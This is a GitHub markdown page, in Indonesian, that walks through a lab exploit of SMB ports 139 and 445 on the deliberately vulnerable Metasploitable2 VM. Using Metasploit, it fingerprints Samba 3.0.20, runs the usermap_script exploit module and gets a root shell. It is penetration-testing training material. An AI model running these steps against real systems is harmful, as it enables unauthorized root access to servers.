Skip to content

Latest commit

 

History

History
79 lines (57 loc) · 2.7 KB

Exploit Port 139 dan 445 SMB.md

File metadata and controls

79 lines (57 loc) · 2.7 KB

Exploit port 139 dan 445 (SMB)

  • Buka msfconsole di terminal
msfconsole

alt text

  • Gunakan modul auxiliary/scanner/smb/smb_version untuk mengetahui versi samba yang digunakan di server
use auxiliary/scanner/smb/smb_version

alt text

  • Tampilkan daftar parameter yang dibutuhkan di modul tersebut. Disini kita hanya perlu mengisi parameter RHOSTS saja
show options

alt text

  • Isi parameter RHOST dengan IP metasploitable2
set RHOST <IP_metasploitable2>

alt text

  • Jalankan modul tersebut. Disini didapat informasi bahwa file server yang digunakan adalah samba versi 3.0.20
exploit

alt text

  • Buka terminal baru gunakan tool searchsploit untuk mencari kelemahan samba versi 3.0.20
searchsploit samba

alt text

  • Buka kembali tool metasploit dan lakukan pencarian modul exploit untuk samba
search samba

alt text

  • Disini kita gunakan modul exploit/multi/samba/usermap_script yang ada di list nomor 8 dari hasil pencarian
use <nomor_modul>

alt text

alt text

  • Tampilkan daftar parameter yang dibutuhkan di modul tersebut. Disini kita hanya perlu mengisi parameter RHOSTS saja
show options

alt text

  • Isi parameter RHOST dengan IP metasploitable2
set RHOST <IP_metasploitable2>

alt text

  • Jalankan modul tersebut. Setelah dijalankan, exploit berhasil mengakses masuk ke dalam server. Jika diketik perintah whoami maka kita berhasil masuk sebagai user root
exploit

alt text